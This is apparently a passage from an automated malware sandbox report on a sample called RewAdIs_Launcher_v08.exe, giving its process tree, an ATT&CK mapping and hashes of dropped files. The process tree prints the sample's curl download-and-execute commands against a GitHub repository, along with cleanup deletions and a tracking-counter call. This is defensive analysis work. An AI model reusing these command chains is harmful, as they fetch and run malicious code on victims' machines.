  C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/TROguz/ndx/main/pc --ssl-no-revoke -o ndx
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4368
- - C:\Windows\system32\curl.exe
    curl https://raw.githubusercontent.com/TROguz/ndx/main/pc --ssl-no-revoke -o ndx
    3⤵
    PID:4484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del ndx
  2⤵
  PID:2976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del
  2⤵
  PID:492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/TROguz/ndx/main/RewAdIs_Launcher_v08.exe --ssl-no-revoke -o RewAdIs_Launcher_v08.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:404
- - C:\Windows\system32\curl.exe
    curl https://raw.githubusercontent.com/TROguz/ndx/main/RewAdIs_Launcher_v08.exe --ssl-no-revoke -o RewAdIs_Launcher_v08.exe
    3⤵
    PID:1768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c RewAdIs_Launcher_v08.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1876
- - C:\Users\Admin\AppData\Local\Temp\RewAdIs_Launcher_v08.exe
    RewAdIs_Launcher_v08.exe
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2364
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/TROguz/ndx/main/pc --ssl-no-revoke -o ndx
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4624
    - - C:\Windows\system32\curl.exe
        
        curl https://raw.githubusercontent.com/TROguz/ndx/main/pc --ssl-no-revoke -o ndx
        5⤵
        
        PID:3316
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del ndx
      4⤵
      PID:892
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del RewAdIs_Launcher_v05.exe
      4⤵
      PID:1036
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl --ssl-no-revoke -O https://raw.githubusercontent.com/TROguz/ndx/{main/z.exe,main/z.dll}
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4240
    - - C:\Windows\system32\curl.exe
        
        curl --ssl-no-revoke -O https://raw.githubusercontent.com/TROguz/ndx/{main/z.exe,main/z.dll}
        5⤵
        
        PID:2292
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl --ssl-no-revoke -O https://raw.githubusercontent.com/TROguz/ndx/{main/ISKA.7z.001,main/ISKA.7z.002}
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3968
    - - C:\Windows\system32\curl.exe
        
        curl --ssl-no-revoke -O https://raw.githubusercontent.com/TROguz/ndx/{main/ISKA.7z.001,main/ISKA.7z.002}
        5⤵
        
        PID:3012
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del /Q temp
      4⤵
      PID:1216
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c z.exe e ISKA.7z.001 -aoa -otemp
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1212
    - - C:\Users\Admin\AppData\Local\Microsoft\ISKA\z.exe
        
        z.exe e ISKA.7z.001 -aoa -otemp
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4808
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del ISKA.7z.001
      4⤵
      PID:4504
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del ISKA.7z.002
      4⤵
      PID:3032
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del ISKA.7z.003
      4⤵
      PID:4052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del ISKA.7z.004
      4⤵
      PID:2148
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl "https://counter9.stat.ovh/private/freecounterstat.php?c=enh1kq3au6353hbgwt5xr7ea61qfbwrl" --ssl-no-revoke -o Tk.png
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4500
    - - C:\Windows\system32\curl.exe
        
        curl "https://counter9.stat.ovh/private/freecounterstat.php?c=enh1kq3au6353hbgwt5xr7ea61qfbwrl" --ssl-no-revoke -o Tk.png
        5⤵
        
        PID:3540
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://shopier.com/10994756
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of WriteProcessMemory
      PID:4560
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9255546f8,0x7ff925554708,0x7ff925554718
        5⤵
        
        PID:3312
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,11386859423453372998,1957611905729694296,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2
        5⤵
        
        PID:2508
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2212,11386859423453372998,1957611905729694296,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3812
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2212,11386859423453372998,1957611905729694296,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2968 /prefetch:8
        5⤵
        
        PID:1676
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,11386859423453372998,1957611905729694296,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
        5⤵
        
        PID:404
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,11386859423453372998,1957611905729694296,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
        5⤵
        
        PID:5104
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,11386859423453372998,1957611905729694296,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
        5⤵
        
        PID:4680
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,11386859423453372998,1957611905729694296,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5708 /prefetch:8
        5⤵
        
        PID:740
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,11386859423453372998,1957611905729694296,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5708 /prefetch:8
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3264

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4268

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4972
- C:\Windows\system32\dashost.exe
  dashost.exe {4f0bc262-6199-49b6-825efaf22d7302c8}
  2⤵
  PID:3516

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
54f1b76300ce15e44e5cc1a3947f5ca9

SHA1
c978bfaa6ec6dae05464c6426eaa6cb3c3e2f3b7

SHA256
43dec5d87b7ee892a3d99cb61f772ba403882ac0772423f36034e84244c1ca24

SHA512
ac26e5676c675be329eb62b5d5a36a0e6014ab8a6366684b0fc2a59ae5f061f596f462b82eb4e9f135d2235a0cbd4af96680d234eecc873a8397fd81507d277a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
c00b0d6e0f836dfa596c6df9d3b2f8f2

SHA1
69ad27d9b4502630728f98917f67307e9dd12a30

SHA256
578481cd359c669455e24983b13723c25584f58925b47283cb580019ef3142b1

SHA512
0e098ab5f5772fec17880e228a0dccbbaa06dc1af14e0fd827f361599c61899fe07d612a7f7b049ff6661d27fdc495566dd20fc28ceed022b87c212bf00be5da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
480B

MD5
e560d2126059782c80f02bd23cf0acb7

SHA1
6e7416eb7a6f2400ff2c9fe65b6e6b7144cf4e37

SHA256
d08b78f3cd3ee5c30bc0b02a2634446dacfb8b96b43255f2e87c9d2064cc69f0

SHA512
4d22f3e90ce6dcb000e5158550ee653deb8e4e1e702afc335f37a9707de0e47df6f12865d76a0ab05ae2977efc4cf5d7767f34dc346ed829a5ff1beff6d96106

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
e533a65b841f7c42c1bed9b8fc4f6b07

SHA1
3c4a05f7ffae93dbdfee2c9aa454306c85623225

SHA256
2f942cf1c59249ac2e209adbfd10b874bd9a3d697e6c2a26fb48c413d2d801d4

SHA512
a3ab6a226f05461297a8e6595052afe79435d06dddc9e725e7a8a99e58560168079735d0475b586d84f288c9c2320dd5da1e0285a305810900ef73a3290ee19d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
0bb8ab4aaaa82e1343c01d65ed77b807

SHA1
6e9f20f6cf004ee9e0f69bfb8bda7bc489bce904

SHA256
710e57876e0daf97ba47d8044acc814059b0e7a578f78135b99a1f9559abcabc

SHA512
34cfc215e39699e2c2a7a697fbb5902b62824a3ff78c9afca7b8c9516656fc15d0a17e396da5ab43dbcb0bc5ee607760f320398357a536673ec92756df3cbb82

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
ff030633dd6c1258b269c77f3cd8ebb4

SHA1
e60b1875794c592a13cd7d34cf0f76dc71ff7fbe

SHA256
04379d404a42cf20e556b0f1b2b19d994b4b9752a5c0405f8a5a15645ba9cd05

SHA512
faa52341bd3395a9fc5c745a3deac95fdc6079edcf78b3a2cd6d438aec1bb7ca5c4e765cd0a4b81793d819a0135cc65210d3641e16475e7b8762c3082a24080f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
a42d9181954628744b1e39ccbc428cea

SHA1
021a420c223fb910634c72023b068564fed997b7

SHA256
da936da136d46a9ddb7e9a62b915ae7981a090c9a0102ab34adafa5602e91840

SHA512
8677afcf7c3bccb1e8dc2eaa6fe02645aa27504dd4633c2d5a5b02a4f1dfc4c4ff30475f0f75ba51583df6168540217c1e18929bbb7b5cc25dd2bcefda0aab7e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\ISKA.7z.001

Filesize
20.0MB

MD5
643458b98c02ebfe98ff6b53813b09df

SHA1
5f6c674fb65bca79dcbf25172776f1ea831c257b

SHA256
54cf4bef8cd7e6190d5db0c8718fe0c8344a26ded6d45b0725e88b6a674bd64c

SHA512
1efecee9ea5aa69974635e4e083435cfb3256a3f81fb82e3870bd335d663ead22eeb3bfa1e93374adb179460cea28a2961fe3d2f14abc67926fd13253739ae26

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\ISKA.7z.002

Filesize
14.9MB

MD5
b1e84e4ccee186f85917c4feb180d753

SHA1
97c85eb6b9ba4770e71c24b97b8d83e561e6f8b4

SHA256
802fd950727747889ecf059b210f7c7e8e063b1425e8b050a24ef545e1994d06

SHA512
0eb2050b8a8cd54ec4f582f2bd543aa27f6572810bce30355a4e347e1fde27ded2b3146ae16562765b27c50aa95d6a8f7603a6b3d9d35a2f1a36ccdd8d258ca1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\Discord.bmp

Filesize
7KB

MD5
7206f478fa02a2f4dd17ee32e1d28c70

SHA1
f5b4b1fd8a8cb24084c69c18285ed191f660b3c8

SHA256
ac53703819e6d9211b3b2bbd3074593a9425ddc6b3c9fef88d71b8c5ddf66e89

SHA512
2470394f02dd34e6901c052619b1054f4ad0ed36cdb9284fa7bba98efb72e430568384b760fb0cc46784d3e88a0d96e3ccadd6824b5cd6c2ebeb1d143cb37cae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\KK.bmp

Filesize
7KB

MD5
dc737b0022fd14466e502c5403193051

SHA1
0d0cea87feaab8d2448e1ff2a8dc54029006973f

SHA256
02e30495f39f114e6d912dc438e9fc476180385846874085f60242c77d1c45d3

SHA512
7788282a170753238a6d8139d304145789d573579ecfffbe0182740c1c09ae8a9239017955d6dc317a632e205d00a50d1cce3f9150849c673c4514ebc35a1311

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\L.bmp

Filesize
58B

MD5
22ba9d43aa1d26928512e501f6a029a5

SHA1
2f309fd033e3a11359698c5ac96d2c74581c58fc

SHA256
c0223f90691a3eff0bf1c2f1737aab1779b6f1a533364c5305832dd63a618794

SHA512
b572d47ae96e9aa92fa864f4df1dd1e4a7a37cf597b7172c640ae80b774ab2c8eca0a99e9b1b3cfb7aaba1f666bda2343fc8c4d25d80de5789e74f3e0c140e18

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\Tk.png

Filesize
968B

MD5
4ad54a11320f20f380cd3f12f25e8080

SHA1
e810f8ea43a40d4eccf0443141fd80e7dd4f8112

SHA256
f8d881ec100f98b0d9cf455b7f88b63c52bf44df3bb4f0a426371c2f97b972c6

SHA512
86726f4a6011e8e9f2626721df3ce78f90e8d7f0ab5d01e262078df9b29430d1f2625e13f6b6e97b0559e9c2405c0ab888a5c98a1d44ddfc5dd5e4d5cecf2491

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\YouTube.bmp

Filesize
7KB

MD5
7b127b317b77fbc4400eaeab3138b99f

SHA1
0a3e9939e93b37cd2544dd5ebb674c143c0b764b

SHA256
fdf902d2ed7c0eb09e5085fc110eabc937d054dfd78906567b876c40621ed5ea

SHA512
cfc12db096a83529802530cd7101eb8522ae88e0b04bc641659e947aac3a22f8fd5ddfcf455fffac7adb6a21d42f9fc50e03d8dc0c84a5ac60d258abd315a921

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\c23.jpg

Filesize
33KB

MD5
06aeef7d0a07888c09a54fb014f8f3ed

SHA1
ac568f544af2d7c6a7a3a7f782b40b1efd4c7026

SHA256
812ee6e81ac8502cd40157658c0bdb71315f624f92d3ee51b81b9a523db21e8a

SHA512
b758c3d34ea77a5934059dd05c114bae403da54fed0985edcd7fa8b2377881413a5b22dbb9923a41459e0f62a7c99c14d234aad281c11de07dbbd30adaaf7487

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\c24.jpg

Filesize
35KB

MD5
6021ede25978647516550ff0fa98452b

SHA1
36c11019ee4b667866863212936c1a39e53bc2cd

SHA256
dce854157fec69025e92da4e960eed0457ff8e2961a31e89481258b630de0a19

SHA512
951b64c1b6dc94a4c0e06d1385f5326acefdb518a58748a8074e0695d6a3e13032ee7b6f20620c4422f2d762dbb7bb4288e0ded29063c69fa03e295855c16a8e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\c25.jpg

Filesize
41KB

MD5
3a6ce3916d3a82a2b20270702f9cd429

SHA1
e9291e0f5fceb7d2a11226b588d50e3201a106d3

SHA256
3ff2ea050900d45cd5ccfdb85878cb30d1b1f0676488aee6f386b468a9a1ff89

SHA512
d11130a315aa09e7d15fe8273ef4371134c8ca69e868ec2edec363077e5d89a1d2036ab94d4b3f3b4d24d2c98935af5ab72fa0b58e5606bf037273db14272bd0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\c26.jpg

Filesize
26KB

MD5
9e8c8adb50d35e6da804585a49467fce

SHA1
8c808649d59a5cb6dc89bf53d2a1594e12675256

SHA256
b6471bddba09e0abfae11213369bba4a73098dfadfeed9ba60965d5c4036aa96

SHA512
b84cf641953aa732a79cbf79fef2cf59d5718d59fe7dab019208027e18d1499b963b3f2d2c908ed022136f74b3fe8e51058030b6c0d53403a26f49b74710bd6d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\c8.jpg

Filesize
45KB

MD5
01f2b87ba0b8e14437a11890c5f1c337

SHA1
4ade2886a07255f496da99169538b0257545db92

SHA256
2637e0039c0760e894815bdf7963f6e236ff347c44510973e9fff24a26a2529c

SHA512
f62a944530b79b86fdbe8ba2ba1d5d905931a398b662173154af759572aa90350789f0e32dd9917e92b60ca42b8b72b4f0463d137425f778ce723de7db7c2c5c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\cc0_2.jpg

Filesize
65KB

MD5
b2889e07e60e9575085c560a6869f1db

SHA1
5742603260ad6d1e633b8c60367c0bdb8ccf9c05

SHA256
e63a64c63c551127a6612fc2657fb380975e3a30320672be2a80c2ab270f25d0

SHA512
7f5817d36370bff84626fcbc294ded8a984bc60b43c8ce93790c3f542c8f87755b22cb55c591f2ed57ba2fc6e0de93ba1188e6bfff8ce5c520d0ed7312529c18

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\cc23.jpg

Filesize
90KB

MD5
10daaf97b1b2b2cd2f220c83356bdd7a

SHA1
eef10a91d6368081068eecf4ca9f23713e1b8806

SHA256
5029c009adb54e3f5d4178b4e51c682ae67030b7f28b34a589e8cc9b397a246c

SHA512
fa57e10815c0aa63c19e10a6ecda6b729083e426f3a85594f4bbafd5401ea62ca0885a450bd90d5c74a8186c1b796411718db0247a4a1e763db461557e930e4c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\cc23_2.jpg

Filesize
109KB

MD5
a92e300605e31b39c52f70be2808aee9

SHA1
4e304598c996d6e87824147dcfae3d0389153703

SHA256
b863fcac91088b271cd420a20c0fb103b57f116c7a62c084d05fecc3c849bb79

SHA512
9573c0295a2f1a6ea7a63ca00b5a79be91e160ee78f09a61a26d3af366f915f22f2d145c96273d7d9805942d85f58707d60654e5367e0b650fbebac26b7da1eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\cc25.jpg

Filesize
185KB

MD5
3f88820debbc8fe1770be57d28bd50fb

SHA1
7ce4601fb05f63ef98574b05258ecebf67c1b3f7

SHA256
7643d44c4e398db7be615fdef4e92649959f0b0bc312eb420a6c054f10497494

SHA512
13a18c51ad99f15ce22d2d8607427138b62e9b9825a8cfaae35d9862c7a174ae334fc1e5fefec799e4ef3d2eea4f24489604ee15954519c7092bbb8ded6e8f28

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\cc8.jpg

Filesize
74KB

MD5
e07040ce9d3f4f089c87e989d51ed74d

SHA1
3ebcbdb9bbdfd14971612b7473d807657b3a9246

SHA256
af26efcbfab0044b9211b62c2823e85bc79154ea62f845978318086dbbb880e4

SHA512
20f8568071d6d02d157fa9030788636f014490a852f3fc16c0eafae3642b3f4a94a9644f0dea041cb8109cb1909b30450fe00af5ecf9492f8604e11603a92ebc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\cinfo23.txt

Filesize
213B

MD5
ee3233dbb446a46edf794040090b3436

SHA1
b57fff818a332c7fbcdaf1d5a56da17c1c045f46

SHA256
4abd3ea9dded40a4f6ef8e6db7f64bc60ff637d874e87f1ef96be700716e99af

SHA512
a6c9349ea5c8a2acee64c9e06f1252f6aaca19a00bb4daa4ea27f7566344dcf2dc09a8ebf172a0cd5eb5ad2094e0b5f10366d29e8fc811594d5cba70a58c572d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\cinfo25.txt

Filesize
27B

MD5
21e15b96ed85cd4a6a9a724051651c6a

SHA1
4d927a350eb295b0e45cbc206403cbfa3949a7db

SHA256
453fc3ed59260c0f242eac4e03dcf0b5bff3042fcd3e7e9a1667fbb43750190a

SHA512
2fdaed9010fbda4cfd1aa1447499bd47936fb8ed9f93f35e10e32f41d3b98c606917c67af09a3f19c7c96551e1211ba50358476e6b8583c9f512fcac2a585065

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\cinfo8.txt

Filesize
190B

MD5
304f7d86d7ec9ed7351758b1594030d7

SHA1
ec295f7c22d5b5335b8c2d65f52b4a2f7b18f4dd

SHA256
0f5e8cb63123b2f9f57d3c06499b9c03e5a2a0ae067baf0716769b21ff9ba216

SHA512
1a0a3c2fa01d9b45ef43e9d3ea0e131b8289ce36cc75c3dd80e6b707fda7f402a0dcd60c58f723d3947035547d7643fa24e57575151854119f5fe03135b5476d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\dd1_2.jpg

Filesize
46KB

MD5
b45787798d43876e2fe6f13917ca8f23

SHA1
ad98e9cff2295efe9814a23a9a23c9d9ce4dc62c

SHA256
2e405285316702e5a09858e4146b3dcd7f3aa02cd9bedf38f4dc90219ba90a57

SHA512
4d09e22ebe7796a2b7de7cd50918a4ec6f8c775c75d0ed6cd3a8fb8cfee0aec51a97642ef3dabfb7c584ea5aa74fb81a4ed6bb949765b460ef929501d30b7d72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\du.bmp

Filesize
7KB

MD5
9e68b1792237bef66d7802791cc771f8

SHA1
7e8a6ee413a7f1d267e04ab209ae7049c40fd00f

SHA256
fba03cfb918bd9f78696d54448b9827bf3f416db9658dc2212f4ed3feabe4be0

SHA512
b5f341b532f0c2f1c721e8092b31cb8ccb03d99be747ca35d519f040217e9e0ebec095921cbbb7183c23b2363d54dfeb97fe068d5e14ef946262197c46491bd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\indir.bmp

Filesize
23KB

MD5
3e7b47d45826dc2c3669661a0eaae6a6

SHA1
83efeabc64b368c1ae9c9876f145ad01cce8259a

SHA256
b8ed3e70ec4b513fd4c236548dc904107018f01c284f965f1bc776e98bea1027

SHA512
939f05daa553dea465f8cc2a3f2368a2fdbb40b9cb365dfb724af265e1329b64effcf30cd5b5275d0bdf854c4caeb8d7173103fec1d94bd5907f113df17dcf3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\kapat.bmp

Filesize
7KB

MD5
96e0159d93305d430be0f017ddd1d0ad

SHA1
09a2c8c63bd9a4f36a170e84be0d91fcf8ca1423

SHA256
0f3bea36dd097a2e659ac143993f39682877656fc6bbc1b8a6186e0f9fe52919

SHA512
3f27f619d6829e0eceb8e6369d11b8f130f01a49f9cfa1b1c1ebbd4e060fcf04c6d317a882b8af09a52a9d9ceb9ab5f8a6a9c2908199c1ae4a8ff86b51a9f393

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\ninfo.txt

Filesize
737B

MD5
423e91ee10910ccfb8311d6ee334fbfc

SHA1
edc7166918e587cababd498137fa583323925cd5

SHA256
f04074e7113ebcda04a635a24541ddf9aa4d0b464791994c8c3aaf7ea9e862f8

SHA512
66640e03530f2374142ce4b8baeb451d2b8a921a2fe1868cdbf60066c5aef4a4e0f9a17643655c5c7f1e7cd3c9be4127d742607eda6249fcfec4cab42d3dc14e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\nn33_2.jpg

Filesize
59KB

MD5
3ef7a635b8df6e886c67bf4c47239c0a

SHA1
2950af123162cb6c8e1d0f20f04a84480d0f97f5

SHA256
9acfc1552c7bbb62e5a2c5c42bbb7ab948e5a04ef56bfc6017f4f9676f66f246

SHA512
81a6703618f5be2d6c7c927339e2dac9fe905024988a964982a4e56d0604b5557cad90793dc7ec7ce10aca7ddd89b3ef7c085aaee53658d52e0f2861a4e49fb3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\ns.bmp

Filesize
7KB

MD5
3e8ffae94a2f30e18fa02e68ed3de382

SHA1
f434484efc15071248e14945b2e32235d318b0a4

SHA256
cf2106a4cbcf9ba5c775504714010d97fae71c4702f16b5ca8056cf732a41b5a

SHA512
bfd4cfc4bb579fe3ad222dcc8dfa1f0529a1f54eef49df3ab845a1f0ef5d7d5e0be7239d3f42f22f9a6dd4681f8a81ba623b4c8ae5cb5cfb15f9f84b978445fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\pc.bmp

Filesize
7KB

MD5
9ee5dd068a015c0a166935d45fb3944f

SHA1
5e55f6e81eed659a37ce4c528d312d4871a38c49

SHA256
c5ceb11164c7c9fd80d168febeff79c9cbeb440ea5cd506b2657eec3df00aecb

SHA512
9f529d95e015d315d7c21739b496efa8b2128b1266085c30c1ccc8fb549497cf6e095b819fa90524cc16b3100d33cf9040ed8250698c2f231f3b5237ce6fb68d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\sol.bmp

Filesize
7KB

MD5
3d04a772d0e6348799de56909c724139

SHA1
f14a1945cc923ab82de9be1181ca4b83c95291a7

SHA256
cc1832d16dbf678719041af0c73d006557b3dbf89dca292bc84fdd615b313f37

SHA512
5a64d9c11d1d1f660b1abdd61ebc0c27641aca466ef9b51bcc537a6adacf1dbed7fc83d19db39987849502086511bc93b0d7afb7ff32c8a244822f5b536be6d2

Download Submit
